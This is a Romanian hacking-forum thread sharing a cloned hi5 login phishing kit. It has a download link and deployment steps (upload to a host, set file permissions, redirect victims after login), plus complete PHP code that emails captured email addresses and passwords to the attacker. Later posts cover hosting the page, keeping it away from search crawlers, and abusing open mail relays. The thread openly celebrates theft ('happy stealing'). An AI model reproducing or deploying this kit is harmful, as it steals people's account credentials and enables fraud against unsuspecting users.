Jump to content
Nytro

HI5 Identic Scam

Recommended Posts

Poate are cineva nevoie ...

Atentie , scam-ul nu e legal ... Nu sunt raspunzator pentru faptele voastre ...

Download :

http://rapidshare.com/files/96396280/HI5_Identic_Scam.rar

O pagina de scam identica . Atentie !!! Nu trimite user si parola pe mail ci le scrie intr-un fisier .

Mod de utilizare : doar uploadati fisierele pe un host , si setati permisiunea 777 ( chmod ) fisierului pass.html . Puteti redenumi hi5.htm dar nu redenumiti xxx.php si pass.html decat daca modificati si in script . Daca aveti putine cunostinte html , php veti sti ce sa faceti daca vreti sa redenumiti . Dupa ce se logheaza , e redirectionat pe hi5.com , pe o pagina care semnaleaza eroare la conectare .

Spor la furat ...

Link to comment
Share on other sites

are cineva varianta care trimite mailuri?

Ca sa trimta mail, tot ce trebuie sa faci e sa inlocuiesti continutul fisierului xxx.php cu asta:


<?php
// HI5 Identic Scam by Nytro
$mail=$_POST['email'];
$password=$_POST['password'];
$continut="Mail : " . $mail . "
Password : " . $password . "

";
$eu = "blabla@caca.com";
$titlu = "Alt iubitor de hi5";
mail($eu, $titlu, $continut);
header("Location: http://hi5.com/friend/login.do;jsessionid=ampeImWJ5rY-");
?>

Ca sa mearga, trebuie ca hostul sa aiba functia mail() activata.

Link to comment
Share on other sites

daca nu doriti sa furati parola ISP-ului sau alte ilegalitati puteti instala un apache2triad1.5.4 pe compul de acasa si aveti xmail local si hosting. Bine, in cazul asta aveti si sql database si... pan la urma merge ideea cu scrierea in fisier text la fel de bine. Oricum cel mai sigur host moca e tot compul de acasa.

Mai sunt solutii din windoze de a instala pagina web acasa dar nu le-am folosit si nu le stiu (ceva cu IIS parca)

Link to comment
Share on other sites

daca nu doriti sa furati parola ISP-ului sau alte ilegalitati puteti instala un apache2triad1.5.4 pe compul de acasa si aveti xmail local si hosting. Bine, in cazul asta aveti si sql database si... pan la urma merge ideea cu scrierea in fisier text la fel de bine. Oricum cel mai sigur host moca e tot compul de acasa.

Mai sunt solutii din windoze de a instala pagina web acasa dar nu le-am folosit si nu le stiu (ceva cu IIS parca)

cine e kamikazee? :D

Edited by loki
Link to comment
Share on other sites

depinde cui i-o faci. Eu mai tin si cate un robots.txt sa nu ma gaseasca tot google... si mai redirectez cate un robotel yahoo de prin loguri care mai vine la o cafea:) :P Chiar, vazusem si eu ca daca dau pe mail link la mine acasa vine si parlitu ala de robot dupa mine.

Link to comment
Share on other sites

majoritatea hosturilor free, nu au functia de mail, daca gasiti postati aici ca si pe mine ma intereseaza.

Mi-am adus aminte de o faza mai veche, nu am folosit-o de mult. Fake mail prin telnet pe portul 25. Gaseam foarte usor servere pe net (incercam diverse IP-uri) care te lasau sa le folosesti ca smtp. Asa se mai inmultesc si virusii. In php nu sunt sigur, se poate folosi alt server cu functia mail()?

Link to comment
Share on other sites

Initial facusem ca scriptul sa trimita mail , dar cum multe hosturi nu au functia mail activata , iar lx.ro de exemplu , pe care scrie : functia mail activata , am incercat sa trimit mail , functia a returnat 1 , si tot nu a mers . Deci mai bine , scriere in fisiere :)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...